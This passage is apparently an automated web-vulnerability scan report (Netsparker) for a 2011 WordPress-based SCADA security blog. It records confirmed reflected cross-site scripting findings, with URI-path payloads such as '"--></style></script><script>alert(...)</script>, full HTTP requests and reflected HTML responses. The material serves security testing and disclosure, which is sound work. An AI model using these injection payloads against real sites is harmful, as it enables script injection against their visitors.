Apathy&quot; for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being a..
- /wp-content/themes/atahualpa/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000471)%3C/script%3E

/wp-content/themes/atahualpa/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000471)%3C/script%3E CONFIRMED

https://www.digitalbond.com/wp-content/themes/atahualpa/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscri..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000471)</script>

Request

GET /wp-content/themes/atahualpa/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000471)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=c08c5868e098031ab723f6ece5332be2; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:37 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-content Themes Atahualpa Js '&quot;--&gt;&lt; Style&gt;&lt; Script&gt;&lt;script&gt;netsparker(0x000471)&lt; Script&gt;</title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond&#039;s SCADA Security Portal &raquo; Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond&#039;s SCADA Security Portal &raquo; Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond&#039;s SCADA Security Portal' 
href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>

<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>

<!-- Header -->
<td id="header" colspan="2">

<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond&#039;s SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1">&nbsp;</div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond&#039;s SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1">&nbsp;</div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item 
menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What&#8217;s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>

</td>
<!-- / Header -->

</tr>

<!-- Main Body -->
<tr id="bodyrow">




<!-- Main Column -->
<td id="middle">

<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>


</td>
<!-- / Main Column -->

<!-- Right Inner Sidebar -->

<!-- Right Sidebar -->
<td id="right">

<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>:&nbsp;&nbsp;<a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a>&nbsp;&nbsp;<a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a>&nbsp;&nbsp;<a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-content/themes/atahualpa/js/\'\"--></style></script><script>netsparker(0x000471)</script>/?_login=dd278283e0"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>

<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-content/themes/atahualpa/js/\'\"--></style></script><script>netsparker(0x000471)</script>/?_login=430f6f3114" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login &raquo;" />

<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>


</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS 
Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of &quot;Executive Level Apathy&quot; for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of &quot;Executive Level Apathy&quot; for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is a..
- /wp-includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000428)%3C/script%3E

/wp-includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000428)%3C/script%3E CONFIRMED

https://www.digitalbond.com/wp-includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000428..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000428)</script>

Request

GET /wp-includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000428)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-includes/js/l10n.js?ver=20101110
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:37 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11367


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-includes '&quot;--&gt;&lt; Style&gt;&lt; Script&gt;&lt;script&gt;netsparker(0x000428)&lt; Script&gt;</title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond&#039;s SCADA Security Portal &raquo; Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond&#039;s SCADA Security Portal &raquo; Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond&#039;s SCADA Security Portal' 
href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>

<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>

<!-- Header -->
<td id="header" colspan="2">

<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond&#039;s SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1">&nbsp;</div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond&#039;s SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1">&nbsp;</div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item 
menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What&#8217;s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>

</td>
<!-- / Header -->

</tr>

<!-- Main Body -->
<tr id="bodyrow">




<!-- Main Column -->
<td id="middle">

<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>


</td>
<!-- / Main Column -->

<!-- Right Inner Sidebar -->

<!-- Right Sidebar -->
<td id="right">

<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>:&nbsp;&nbsp;<a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a>&nbsp;&nbsp;<a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a>&nbsp;&nbsp;<a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-includes/\'\"--></style></script><script>netsparker(0x000428)</script>/?_login=b5eb9cb5ba"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>

<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-includes/\'\"--></style></script><script>netsparker(0x000428)</script>/?_login=13cbcc5887" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login &raquo;" />

<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>


</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS 
Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of &quot;Executive Level Apathy&quot; for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of &quot;Executive Level Apathy&quot; for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is an organized disruption that disables or impairs the integ..
- /wp-admin/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000427)%3C/script%3E

/wp-admin/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000427)%3C/script%3E CONFIRMED

https://www.digitalbond.com/wp-admin/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00042..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000427)</script>

Request

GET /wp-admin/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000427)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-admin/css/login.css?ver=20110121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
